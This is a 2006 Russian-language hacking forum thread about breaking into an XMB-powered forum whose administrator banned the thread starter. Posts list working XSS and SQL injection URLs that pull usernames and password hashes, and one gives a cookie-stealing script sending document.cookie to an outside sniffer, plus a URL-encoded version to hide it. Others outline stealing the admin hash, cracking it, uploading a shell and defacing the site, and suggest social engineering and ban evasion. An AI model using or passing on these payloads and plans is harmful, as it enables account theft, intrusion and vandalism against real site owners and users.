Форумы Есть ли уязвимости у Xmb ?

Discussion in 'Уязвимости CMS/форумов' started by netzzz, 12 Jul 2006.

  1. netzzz

    netzzz Elder - Старейшина

    Joined:
    11 Aug 2005
    Messages:
    29
    Likes Received:
    3
    Reputations:
    0
    Обыскал форум через поиск по запросу Xmb выдал только 1 статью да и то не по уязвимости, неужели у этого форума совсем нет уязвимостей ? на секьюрити лаб все статьи по старым форумам, 1.5, 1.6 1.8
    если не увидел чего .. ткните носом
     
  2. Nova

    Nova Green member

    Joined:
    15 Jul 2005
    Messages:
    1,233
    Likes Received:
    420
    Reputations:
    280
    Форум просто не сильнопопулярный по этому особо нечего и нет....
    Я поищу если что найду стоящие то выложу....

    Тебя какие версий интересуют ?
     
    _________________________
  3. j0nathan

    j0nathan Elder - Старейшина

    Joined:
    13 Jul 2006
    Messages:
    61
    Likes Received:
    6
    Reputations:
    0
    Code:
    Программа: XMB 1.9.3 и более ранние версии 
    Опасность: Низкая 
    
    Наличие эксплоита: Нет 
    
    Описание: 
    Уязвимость позволяет удаленному пользователю произвести XSS нападение.
    
    Уязвимость существует при обработке поля "Your Current Mood" при регистрации учетной записи. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML код в браузере жертвы в контексте безопасности уязвимого сайта. 
    
    Программа: XMB 1.9.3, возможно более ранние версии 
    Опасность: Средняя 
    
    Наличие эксплоита: Нет 
    
    Описание: 
    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
    
    Уязвимость существует из-за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения
    
    Программа: XMB Forum 1.9.3 и более ранние версии 
    Опасность: Низкая 
    
    Наличие эксплоита: Да 
    
    Описание: 
    Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
    
    Уязвимость существует при обработке входных данных в параметре username сценария u2u.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:
    
    http://[host]/u2u.php?action=send&username=[code] 
    Программа: XMB Forum 1.8 Partagium Final SP2 (Build: 2003100518) 
    Опасность: Средняя 
    
    Наличие эксплоита: Да 
    
    Описание: Несколько уязвимостей обнаружено в XMB Forum. Удаленный пользователь может выполнить SQL команды на основной базе данных и выполнить XSS нападение. 
    
    Пример/Эксплоит: 
    
    http://[target]/xmb18sp2/forumdisplay.php?fid=1&foobar=<%73cript>
    
    http://[target]/xmb18sp2/member.php?action=viewpro&member=x<%73cript>al ert
    (document.cookie);</%73cript>
    
    http://[target]/xmb18sp2/u2uadmin.php?uid=x"><%73cript>alert(document.cookie);
    </%73cript>
    
    http://[target]/xmb18sp2/editprofile.php? user=x"><%73cript>alert
    (document.cookie);</%73cript>
    
    http://[target]/xmb18sp2/viewthread.php?tid=1&ppp=x<%73cript>alert
    (document.cookie);</%73cript>
    
    http://[target] /xmb18sp2/misc.php?action=list&order=postnum&desc=x
    
    
    http://[target]/xmb18sp2/misc.php?action=list&order=postnum&desc=x<%73cript>alert
    (document.cookie);</%73cript>
    
    http://[target]/xmb18sp2/forumdisplay.php?fid=1&tpp=x<%73cript>alert
    (document.cookie);</%73cript>
    
    http://[target]/xmb18sp2/forumdisplay.php?fid=1&ascdesc=x<%73cript>ale rt
    (document.cookie);</%73cript>
    
    text1 [align=center onmouseover=alert(document.cookie);] text2 [/align]
    
    
    text1 [img=1x1]javascript:alert(document.cookie);//gif[/img] text2
    
    
     http://[target]/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL 
    SELECT NULL,NULL,username FROM xmb_members WHERE uid=1
    LIMIT 1/*
    
    http://[target]/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT
     NULL,NULL,password FROM xmb_members WHERE uid=1
    LIMIT 1/*
    
    Программа: XMB Forum 1.8 Partagium SP3; 1.9 Nexus Beta 
    Опасность: Средняя 
    
    Наличие эксплоита: Да 
    
    Описание: Несколько уязвимостей обнаружено в XMB Forum. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение. 
    
    Пример/Эксплоит: 
    
    http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=foobar
    
    http://localhost/xmb19beta/member.php?action=viewpro&m ember=waraxe&restrict=<body%20onload=alert(document.cookie);>
    
    http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY %20p.fid%20UNION%20SELECT%20password,null,9
    
    http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY%20p.fid%20UNION%2 0SELECT%20username,null,9
    
    http://localhost/xmb19beta/misc.php?action=search&restrict=<body%20onload=alert(document.cookie);>
    
    http://localhost/xmb19beta/misc.php?act ion=search&restrict=%20private=-99%20UNION%20SELECT%20null,null,password,null,null,null,null,null,null,null,null,
    1%20LIMIT%201%20/*
    
    http://localhost/xmb19beta/today. php?restrict=<body%20onload=alert(document.cookie);>
    
    http://localhost/xmb19beta/forumdisplay.php?fid=1&tpp=<body%20onload=alert(document.cookie);>
    
    http://localhost/xmb19beta/xmb.php?show=version&xmbuser=foobar><body onload=alert(document.cookie);>
    
    http://localhost/xmb19beta/editprofile.php?u ser=notexist_foobar&u2uheader=<body%20onload=alert(document.cookie);>
    
    http://localhost/xmb19beta/u2u.php?folder=foobar"><body%20onload=alert(document.cookie);>
    
    http ://localhost/xmb19beta/stats.php?action=view&viewmost="></textarea><body%20onload=alert(document.cookie);>
    
    http://localhost/xmb19beta/stats.php?action=view&replymost=" ></textarea><body%20onload=alert(document.cookie);>
    
    http://localhost/xmb19beta/stats.php?action=view&latest="></textarea><body%20onload=alert(document.cookie);>
    
    htt p://localhost/xmb19beta/post.php?action=newthread&fid=1&message="></textarea><body%20onload=alert(document.cookie);>
    
    http://localhost/xmb19beta/post.php?action=newthre ad&fid=1&icons=<body%20onload=alert(document.cookie);>
    
    http://localhost/xmb19beta/forumdisplay.php?fid=1&threadlist=<body%20onload=alert(document.cookie);>
    
    http://l ocalhost/xmb19beta/forumdisplay.php?fid=1&pagelinks=<body%20onload=alert(document.cookie);>
    
    http://localhost/xmb19beta/forumdisplay.php?fid=1&forumlist=<body%20onload= alert(document.cookie);>
    
    http://localhost/xmb19beta/forumdisplay.php?fid=1&navigation=<body%20onload=alert(document.cookie);>
    
    http://localhost/xmb19beta/forumdispla y.php?fid=1&forumdisplay=<body%20onload=alert(document.cookie);>
    
    Программа: XMB Forum 1.9.1 
    Опасность: Низкая 
    
    Наличие эксплоита: Нет 
    
    Описание: 
    Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важной информации пользователей. 
    
    Уязвимость существует из-за недостаточной фильтрации данных в параметре Mood и поле Send To. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. 
    Это ещё не все :D
    Code:
    http://www.securitylab.ru/vulnerability/page1_670.php?page=1_670&arrFilter_ff%5BSECTION_ID%5D=&arrFilter_ff%5BSEARCHABLE_CONTENT%5D=xmb&set_filter=%D4%E8%EB%FC%F2%F0&set_filter=Y
    
    в иксМБ много иксс! Можно спокойно мд5 угнать :)
     
    #3 j0nathan, 14 Jul 2006
    Last edited by a moderator: 14 Jul 2006
  4. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    на Xmb есть очень хорошоя SQL-инъекция котороя существует из за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php .
     
  5. j0nathan

    j0nathan Elder - Старейшина

    Joined:
    13 Jul 2006
    Messages:
    61
    Likes Received:
    6
    Reputations:
    0
    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

    Уязвимость существует из-за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения


    А какой запрос делать чтобы хэш увидеть у первого id ??
     
  6. netzzz

    netzzz Elder - Старейшина

    Joined:
    11 Aug 2005
    Messages:
    29
    Likes Received:
    3
    Reputations:
    0
    вот вот я тоже бы хотел это узнать, хотя я в этом сильно сомневаюсь, похожая описанной уязвимости была насколько я помню в phpBB 2.0.6 , не думаю что xmb не исправило эту багу
     
  7. j0nathan

    j0nathan Elder - Старейшина

    Joined:
    13 Jul 2006
    Messages:
    61
    Likes Received:
    6
    Reputations:
    0
    Возможно нет вслудуйщей мне кажеться залатают дыру
     
  8. netzzz

    netzzz Elder - Старейшина

    Joined:
    11 Aug 2005
    Messages:
    29
    Likes Received:
    3
    Reputations:
    0
    да кстати версия которая меня интерисует 1.9.5
    а по поводу распространенности, то считаю его зря подзабыли орум классный и по функциональности давно обогнал phpBB в стандартной комплектации
     
  9. j0nathan

    j0nathan Elder - Старейшина

    Joined:
    13 Jul 2006
    Messages:
    61
    Likes Received:
    6
    Reputations:
    0
    Зарегайся на форуме и проверь xss
    Code:
    http://[адресс форума]/u2u.php?action=send&username=<script>alert('lol')</script>
    если алерт пашет то пиши в ПМ админу типа чё за косяк
    Code:
    http://[адресс форума]/u2u.php?action=send&username=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> 
    Есть в инете специальные скрипты
    но можно немного скрипт сниффа приныкать но можно лучше сныкать
    Code:
    http://[адресс форума]/u2u.php?action=send&username=%3Cscript%3Eimg+%3D+new+Image%28%29%3B+img.src+%3D+%22http%3A%2F%2Fantichat.ru%2Fcgi-bin%2Fs.jpg%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E
    Админ по ссылке зайдёт и ты его хэш забираешь и разшифровываешь :) Кстати ПС
    тебе придётся ждать долго чтоб он записал свои данные в лог тебе надо будет ждать и палить лог
    http://antichat.ru/sniff/log.php
    Но можно на хостинге свой поставить и чтобы он в текстовик их писал так удобней будет :) Вся эта шняга на 1.8 точно пашет ну ещё должна на 1.9.3
     
    1 person likes this.
  10. netzzz

    netzzz Elder - Старейшина

    Joined:
    11 Aug 2005
    Messages:
    29
    Likes Received:
    3
    Reputations:
    0
    в этом то вся и проблема, админ не ламер в принципе, рега закрыта и дает регится он только проверенным пользователям, может можно как нибудь шелл залить ?
     
  11. Brahma

    Brahma Elder - Старейшина

    Joined:
    14 Jul 2006
    Messages:
    55
    Likes Received:
    13
    Reputations:
    6
    В последних версиях - критических уязвимостей нет, присутствует Xss.
     
  12. j0nathan

    j0nathan Elder - Старейшина

    Joined:
    13 Jul 2006
    Messages:
    61
    Likes Received:
    6
    Reputations:
    0
    ][оть и админ не ламер но он человек с иксСС наеб*ть его можно :)
     
  13. netzzz

    netzzz Elder - Старейшина

    Joined:
    11 Aug 2005
    Messages:
    29
    Likes Received:
    3
    Reputations:
    0
    не думаю я что у него пройдет xss но попробовать можно если подскажете какую нить рабочую... те что были описаны ранее не работают
     
  14. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Дружище... не парься, ксс найдешь, через пм катай этот ксс админу и всем модерам, один модер по любому попадется, а там редкатируй все разделы форума, и вставляй ксс а там админ попадется вот и усе, получил хешь, через онлайн базу мд5 получил пасс и заходи в админку и лей шелл и дефайс его =)
     
  15. netzzz

    netzzz Elder - Старейшина

    Joined:
    11 Aug 2005
    Messages:
    29
    Likes Received:
    3
    Reputations:
    0
    проблема в том что через ПМ я ничего послать не могу, т.к. админ разрешает регится только проверенным пользователям, а поскольку он зациклен на безопасности, (мания преследования у него) то это практически не реально, могут ли быть другие способы ?
     
  16. Brahma

    Brahma Elder - Старейшина

    Joined:
    14 Jul 2006
    Messages:
    55
    Likes Received:
    13
    Reputations:
    6
    Не мания - а защита от таких как ты)
     
  17. netzzz

    netzzz Elder - Старейшина

    Joined:
    11 Aug 2005
    Messages:
    29
    Likes Received:
    3
    Reputations:
    0
    защита от таких как я тут.. а там где закрыта рега , где в чат входишь и тебя банят только из за того что ты из какого то определенного города, то это уже дескриминация по территориальному признаку и мания преследования
     
  18. Brahma

    Brahma Elder - Старейшина

    Joined:
    14 Jul 2006
    Messages:
    55
    Likes Received:
    13
    Reputations:
    6
    Если ты не в курсе - любой сайт - это частная вирт. собственность, и тут уже право админа - пускать тебя на свой ресурс, открывать или закрывать регистрацию...etc.
    Советую заработать там себе репутацию, втереться в доверие, и хакнуть по полной) Соц. инженерией пользуйся.
     
  19. netzzz

    netzzz Elder - Старейшина

    Joined:
    11 Aug 2005
    Messages:
    29
    Likes Received:
    3
    Reputations:
    0
    Ладно допустим это частная собственность и я бы может не принял бы это так близко если перед тем как меня забанили меня не обвинили в том чего я не делал, по сути за это и забанили, за то чего я не делал.. но это так отступление....
    вернемся к нашим баранам... если пользоваться СИ и втерется в доверие, для этого нужен доступ, а там я забанен по ай пи, все бы ничего если бы не корпоративный прокси через который идет выход в нет и возможности сменить прокси обычным методом нет... поэтому нужно прибегнуть к соксификации
    из этого возник следующий вопрос... на серваке стоит Kerio Winroute Firewall держит ли он что нибудь из (CONNECT, Socks4, Socks5) если да то где можно почитать про настройку, если нет то как можно прикрутить эти вещи к Kerio и можно ли, а если нет то какая есть альтернатива прокси серверу и как его можно настроить (читать : где найти как настроить, поисковики просьба не предлагать, я уже облазил что можно ничего толкового не нашел, или просто не знал что искать)
     
  20. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Чёт я ни хрена не догнал,где там ошибка в обработке кук в today.php.Или в версиях 1.9.1 и 1.9.2 их нет?